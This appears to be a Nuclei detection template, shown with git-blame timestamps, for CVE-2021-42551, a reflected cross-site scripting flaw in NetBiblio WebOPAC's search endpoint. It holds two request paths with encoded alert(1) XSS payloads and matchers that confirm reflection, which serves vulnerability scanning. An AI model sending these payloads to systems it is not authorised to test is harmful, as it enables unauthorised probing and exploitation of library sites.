2022-01-16 13:31:29 +00:00
id : CVE-2021-42551
info :
2022-09-09 17:34:37 +00:00
name : NetBiblio WebOPAC - Cross-Site Scripting
2022-01-16 13:31:29 +00:00
author : compr00t
severity : medium
2022-02-28 16:05:59 +00:00
description : NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
2022-01-16 13:31:29 +00:00
reference :
2022-02-28 14:09:26 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-42551
2022-01-16 13:31:29 +00:00
- https://www.redguard.ch/advisories/netbiblio_webopac.txt
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-01-16 13:31:29 +00:00
cve-id : CVE-2021-42551
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.00124
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.46073
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : alcoda
product : netbiblio
tags : cve,cve2021,xss,netbiblio
2022-01-16 13:31:29 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-16 13:31:29 +00:00
- method : GET
path :
- '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x'
- '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F'
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-01-16 13:31:29 +00:00
max-redirects : 3
2023-07-11 19:49:27 +00:00
2022-01-16 13:31:29 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- "SearchTerm: 'x'+alert(1)+'x',"
- "SearchTerm: 'x\\\\'+alert(1),//',"
condition : or
- type : word
part : header
words :
- "text/html"
- type : word
part : body
words :
- "NetBiblio"
- type : status
status :
- 200